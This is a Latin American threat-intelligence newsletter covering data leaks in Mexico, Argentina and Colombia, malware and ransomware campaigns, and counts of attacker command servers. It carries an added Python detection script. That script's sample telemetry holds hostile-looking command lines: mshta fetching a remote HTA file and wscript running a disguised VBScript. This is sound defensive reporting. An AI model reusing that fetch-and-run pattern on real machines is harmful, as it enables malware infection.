--[ Anomalía #5 - Latam leaks in circulation - Exfiltradaz arrives ]--
April 03, 2026
By: ZoqueLabs
This writing is distributed under a Creative Commons CC BY-SA (Attribution - Share Alike) license.
In January 2026, a group operating under the name Chronus published 2.3 terabytes of data from 25 Mexican public institutions. The government responded that the affected systems were obsolete and managed by private parties, that the compromised credentials had already been disabled, and that there was no breach of central infrastructure. The data continued to circulate on Telegram.
On March 30, a group under the name ChronusTeam published 28 simultaneous breaches against the Argentine State: Central Bank, national ministries, police forces of several provinces, health and education systems. There is no clear public confirmation. Claims continue to circulate in forums and channels.
In Colombia, meanwhile, in addition to accumulation there is also simultaneity. On April 2, multiple leaks appeared that affect public, financial and educational sectors at the same time —from territorial entities to databases associated with national systems—, expanding the scope and the risk of exposure of sensitive data.
The pattern is not in the technique but in what happens after the leak. The databases end up in forums and Telegram channels, are packaged by data type (credentials, KYC, accesses) and are reused in targeted phishing and fraud campaigns. Between incidents there is no public traceability or confirmation of mitigation: partial responses or silence. Mexico, Argentina and Colombia repeat the same sequence, with actors changing names but operating on the same data sets and distribution circuits.
Exfiltradaz tries to make this type of pattern visible. This week we launched this initiative to monitor the circulation of data in the region: collection of public signals in forums and channels, structuring of what appears, open publication of data and pipelines on GitHub. It is neither a repository of leaked databases nor an incident verification system. It’s flow tracking.
Insights and data are available directly at Exfiltradaz. You can review it and, as always, comments and contributions are welcome. 💚
–[ Malware ]–
LATAM - Horabot is still active, now with fake CAPTCHA in Mexico
Kaspersky documented an active Horabot campaign focused on Mexico. It is not new —it has been operating since 2020 and is of Brazilian origin— but the current version has relevant changes. The entry vector is no longer just an invoice attachment: it now starts with a fake CAPTCHA page instructing the victim to open the Windows Run dialog and paste a command. From there an infection chain is deployed in layers: HTA, VBScript, AutoIT as loader, and finally a banking Trojan loaded directly into memory. Kaspersky found a public database maintained by the attackers in which 93% of the victims are in Mexico.
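The layered chain described above (Run dialog → HTA → VBScript → AutoIt loader) leaves a recognizable parent/child process lineage. The following is an added detection example, not code from Kaspersky or the newsletter; the process events are constructed to mimic Sysmon-style process-creation records, and the image names per stage are an assumption about how such a chain typically surfaces in telemetry.

```python
"""Flag a process lineage matching the Horabot-style chain:
origin -> mshta (HTA) -> wscript/cscript (VBScript) -> AutoIt3 (loader).
The events below are constructed sample telemetry, not real data."""

# Constructed process-creation events (Sysmon EID 1 style).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "mshta.exe",
     "cmd": 'mshta.exe "http://example.invalid/c.hta"'},
    {"pid": 300, "ppid": 200, "image": "wscript.exe",
     "cmd": "wscript.exe //e:vbscript C:\\Users\\Public\\s.txt"},
    {"pid": 400, "ppid": 300, "image": "AutoIt3.exe",
     "cmd": "AutoIt3.exe C:\\Users\\Public\\l.a3x"},
    {"pid": 500, "ppid": 100, "image": "winword.exe", "cmd": "winword.exe doc.docx"},
]

# Ordered stages of the chain; each stage accepts any listed image name.
# These image names are an assumption about how the layers appear in logs.
CHAIN = [
    {"mshta.exe"},                    # HTA stage
    {"wscript.exe", "cscript.exe"},   # VBScript stage
    {"autoit3.exe"},                  # AutoIt loader stage
]


def find_chains(events, chain=CHAIN):
    """Return (lineage_pids, origin_image) for every process whose
    ancestry matches all stages of `chain` in order.  origin_image is
    the parent of the first stage (explorer.exe when the command was
    pasted into the Run dialog, as the fake CAPTCHA lure instructs)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() not in chain[-1]:
            continue                      # only start from the last stage
        lineage, cur, ok = [e["pid"]], e, True
        for stage in reversed(chain[:-1]):
            parent = by_pid.get(cur["ppid"])
            if parent is None or parent["image"].lower() not in stage:
                ok = False
                break
            lineage.append(parent["pid"])
            cur = parent
        if ok:
            origin = by_pid.get(cur["ppid"])
            hits.append((list(reversed(lineage)),
                         origin["image"] if origin else None))
    return hits
```

A single mshta or wscript launch is common in legitimate environments; alerting on the full ordered lineage keeps the rule specific to this chain.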
Brazil — Casbaneiro and Horabot together
A recent campaign is attributed to a Brazilian actor who combines Horabot with Casbaneiro —a banking Trojan known in the region for years— in an operation that is no longer limited to LATAM: it also targets Spanish speakers in Europe. The group operates two channels in parallel: one via WhatsApp for end users, another via email for corporate environments. The decoy is a fake subpoena. What changes from previous campaigns is that the malicious PDF is generated dynamically for each victim, making it harder to detect by signature. Once inside, the malware hijacks the email account and uses its own contacts to continue distributing the phishing.
Operation NoVoice — rootkit on Google Play, 2.3 million downloads
McAfee documented Operation NoVoice, an Android rootkit campaign distributed across more than 50 apps on Google Play —cleaners, games, gallery utilities— that racked up at least 2.3 million downloads before being removed. The malware exclusively targets devices whose security patch level predates May 2021, exploiting vulnerabilities known since 2016. On vulnerable devices it achieves full control: it installs itself on the system partition, survives a factory reset, and once active it injects code into each app that is opened. The observed payload targets WhatsApp, cloning the entire session. The infection graph shows concentration in Africa and Asia, with presence in several LATAM countries where devices that no longer receive security updates remain in circulation.
–[ Leaks ]–
Argentina — 28 breaches announced against the State
A group under the name ChronusTeam published 28 simultaneous breaches against multiple entities of the Argentine State: Central Bank, ministries, police forces and health and education systems. The volume and scope point to a coordinated operation, but there is no clear public technical confirmation of the compromises. Part of the information circulates in forums and channels associated with leaks, where lists of accesses and partial samples appear.
Colombia — multiple leaks in parallel
In recent days several leaks appeared that simultaneously affect public, financial and educational entities in Colombia. Among the cases indicated are the Mayor's Office of Medellín, Banco Finandina, Banco W and the University of Cauca. Some of the incidents are once again linked to actors we had already been following, such as NyxarGroup, while others appear associated with different aliases such as Petro_Escobar or DelitosPenales; in recent days these groups have joined together to make leak announcements jointly. Some of these we are already tracking in Exfiltradaz. The data presented includes personal information, financial histories, administrative records and databases associated with national systems. Some of the material already circulates in forums and channels where this type of dump is shared.
Brazil / Tanzania — alleged access to municipal and police systems
An actor under the alias cozypandas published access to municipal administration systems in Brazil (Macaíba, Rio Grande do Norte) and mail infrastructure associated with police forces in Tanzania. In the case of Brazil, administrative records with personal data (names, dates of birth and other identifiers) are mentioned. For Tanzania, the access would be linked to institutional email accounts with MD5 hashes and weak passwords. There is no public confirmation of the compromise.
–[ Research and tools ]–
Coruna — Kaspersky confirms the link with Operation Triangulation
For those who research iOS in the region, an update on Coruna, which we had already mentioned. Kaspersky published the code analysis that was missing: Coruna is not an assembly of public exploits but a direct evolution of the same framework used in Operation Triangulation. The authors are the same. The kit remained active and kept receiving updates —it includes support for recent Apple hardware— and the circulation logic between espionage and cybercrime actors that we pointed out before now has a more concrete explanation:
–[ Malicious activity/Ransomware ]–
LATAM — "Akira" ransomware in name only
ESET detected a ransomware campaign targeting South America that imitates Akira in almost everything —ransom note, Tor URLs, file extension— but inside it uses code from Babuk, a ransomware whose source code was leaked in 2021 and has been circulating freely since then. Someone is using Akira's name to position the operation. The interesting point is operational: the branding of established groups is already being used as a pressure tool, regardless of actual affiliation.
LATAM — TheGentlemen: ransomware with growing regional presence
Since mid-2025, TheGentlemen has positioned itself as one of the most active ransomware groups. What defines it is not the volume but the method: it studies the defenses of each target, adapts its tools during the intrusion if the controls block it, and operates under a double extortion model. In LATAM it has confirmed victims in Colombia, Argentina, Chile, Brazil and other countries in the region. The target profile is repeated: sectors with sensitive data and critical infrastructure.
–[ ZOLIM - This week’s snapshot (04/02/2026) ]–
With 13 new IPs in this snapshot, the infrastructure continues to grow.
Some signs from this week:
- GoPhish remains the base with the majority of nodes and keeps repeating the same patterns —especially port 3333 (37 IPs)— across multiple countries and ASNs.
- Quasar keeps growing and remains distributed, while Sliver grows slightly. DCRat (8) and Havoc (5) appear more concentrated in certain countries, especially Colombia and Brazil.
- Brazil continues to concentrate more than half of the infrastructure (68 IPs), with São Paulo as the dominant point. Colombia remains stable (14), with activity in Barranquilla and Valledupar associated with DCRat and AsyncRAT.
- New ISPs appear that we had not seen in previous snapshots. One of them in Sinaloa (Mexico) hosting a GoPhish node, outside the usual providers. Infrastructure is moving towards more local networks.
- UnamWebPanel reappears, now combined with Sliver on a node.
The infrastructure continues to be deployed on commercial cloud and regional providers (Oracle, Amazon, Microsoft), with a persistent presence among snapshots.
In ZOLIM you can explore the complete snapshot and the table where we publish all active IPs by country if you want to delve deeper into the data :D